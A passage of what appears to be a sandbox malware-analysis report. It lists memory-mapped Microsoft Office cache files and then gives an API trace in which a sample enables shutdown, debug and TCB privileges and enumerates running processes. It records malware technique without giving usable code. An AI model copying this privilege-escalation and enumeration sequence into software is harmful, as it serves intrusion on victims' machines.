Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml") Region: id = 1014 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "infopathmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml") Region: id = 1015 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1016 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1017 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1018 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1019 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1020 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1021 start_va = 0xa0000 end_va = 0xa8fff entry_point = 0xa0000 region_type = mapped_file name = "visiolr.cab" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab") Region: id = 1022 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "visiolr.cab" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab") Region: id = 1023 start_va = 0xa0000 end_va = 0xa8fff entry_point = 0xa0000 region_type = mapped_file name = "visiolr.cab" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab") Region: id = 1024 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "visiomui.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml") Region: id = 1025 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "visiomui.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml") Region: id = 1026 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "visiomui.xml" filename = "\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml") Region: id = 1027 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "onenotemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml") Region: id = 1028 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "onenotemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml") Region: id = 1029 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "onenotemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml") Region: id = 1030 start_va = 0xa0000 end_va = 0xa5fff entry_point = 0xa0000 region_type = mapped_file name = "onotelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab") Region: id = 1031 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "onotelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab") Region: id = 1032 start_va = 0xa0000 end_va = 0xa5fff entry_point = 0xa0000 region_type = mapped_file name = "onotelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab") Region: id = 1033 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1034 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1035 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1036 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "projectmui.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml") Region: id = 1037 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "projectmui.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml") Region: id = 1038 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "projectmui.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml") Region: id = 1039 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "projlr.cab" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab") Region: id = 1040 start_va = 0x3240000 end_va = 0x3a21fff entry_point = 0x3240000 region_type = mapped_file name = "projlr.cab" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab") Region: id = 1041 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "projlr.cab" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab") Region: id = 1042 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1043 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1044 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1045 start_va = 0xa0000 end_va = 0xa7fff entry_point = 0xa0000 region_type = mapped_file name = "groovelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab") Region: id = 1046 start_va = 0x3240000 end_va = 0x3627fff entry_point = 0x3240000 region_type = mapped_file name = "groovelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab") Region: id = 1047 start_va = 0xa0000 end_va = 0xa7fff entry_point = 0xa0000 region_type = mapped_file name = "groovelr.cab" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab") Region: id = 1048 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "groovemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml") Region: id = 1049 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "groovemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml") Region: id = 1050 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "groovemui.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml") Region: id = 1051 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1052 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1053 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1054 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "branding.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml") Region: id = 1055 start_va = 0x2850000 end_va = 0x28e1fff entry_point = 0x2850000 region_type = mapped_file name = "branding.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml") Region: id = 1056 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "branding.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml") Region: id = 1057 start_va = 0xa0000 end_va = 0xa9fff entry_point = 0xa0000 region_type = mapped_file name = "officelr.cab" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab") Region: id = 1058 start_va = 0x3240000 end_va = 0x3fb9fff entry_point = 0x3240000 region_type = mapped_file name = "officelr.cab" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab") Region: id = 1080 start_va = 0xa0000 end_va = 0xa9fff entry_point = 0xa0000 region_type = mapped_file name = "officelr.cab" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab") Region: id = 1081 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "officemui.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml") Region: id = 1082 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "officemui.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml") Region: id = 1115 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "officemui.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml") Region: id = 1117 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "officemuiset.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml") Region: id = 1135 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "officemuiset.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml") Region: id = 1165 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "officemuiset.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml") Region: id = 1179 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1180 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1181 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1241 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "accessmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml") Region: id = 1242 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "accessmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml") Region: id = 1243 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "accessmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml") Region: id = 1244 start_va = 0xa0000 end_va = 0xa7fff entry_point = 0xa0000 region_type = mapped_file name = "acclr.cab" filename = "\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab") Region: id = 1245 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "acclr.cab" filename = "\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab") Thread: id = 2 os_tid = 0x964 [0015.027] DisableThreadLibraryCalls (hLibModule=0x74950000) returned 1 [0015.052] GetTickCount () returned 0x1382f [0015.052] srand (_Seed=0x113e0af) [0015.052] GetTickCount () returned 0x1382f [0015.052] GetCurrentProcess () returned 0xffffffff [0015.052] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18f5d8 | out: TokenHandle=0x18f5d8*=0xf4) returned 1 [0015.052] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeShutdownPrivilege", lpLuid=0x18f5c8 | out: lpLuid=0x18f5c8*(LowPart=0x13, HighPart=0)) returned 1 [0015.055] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x18f5c4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0015.055] GetLastError () returned 0x0 [0015.055] SetLastError (dwErrCode=0x0) [0015.055] GetCurrentProcess () returned 0xffffffff [0015.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18f5d8 | out: TokenHandle=0x18f5d8*=0x138) returned 1 [0015.055] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18f5c8 | out: lpLuid=0x18f5c8*(LowPart=0x14, HighPart=0)) returned 1 [0015.056] AdjustTokenPrivileges (in: TokenHandle=0x138, DisableAllPrivileges=0, NewState=0x18f5c4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0015.056] GetLastError () returned 0x0 [0015.056] SetLastError (dwErrCode=0x0) [0015.056] GetCurrentProcess () returned 0xffffffff [0015.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x18f5d8 | out: TokenHandle=0x18f5d8*=0x13c) returned 1 [0015.056] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x18f5c8 | out: lpLuid=0x18f5c8*(LowPart=0x7, HighPart=0)) returned 1 [0015.056] AdjustTokenPrivileges (in: TokenHandle=0x13c, DisableAllPrivileges=0, NewState=0x18f5c4*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0015.056] GetLastError () returned 0x514 [0015.056] SetLastError (dwErrCode=0x514) [0015.056] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0015.059] Process32FirstW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0015.059] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0015.060] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0015.060] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0015.060] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0015.061] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0015.061] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0015.062] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0015.062] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0015.062] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0015.063] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.063] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.064] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.064] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.064] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.065] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0015.065] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.065] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x158, th32DefaultHeapID=0x0, 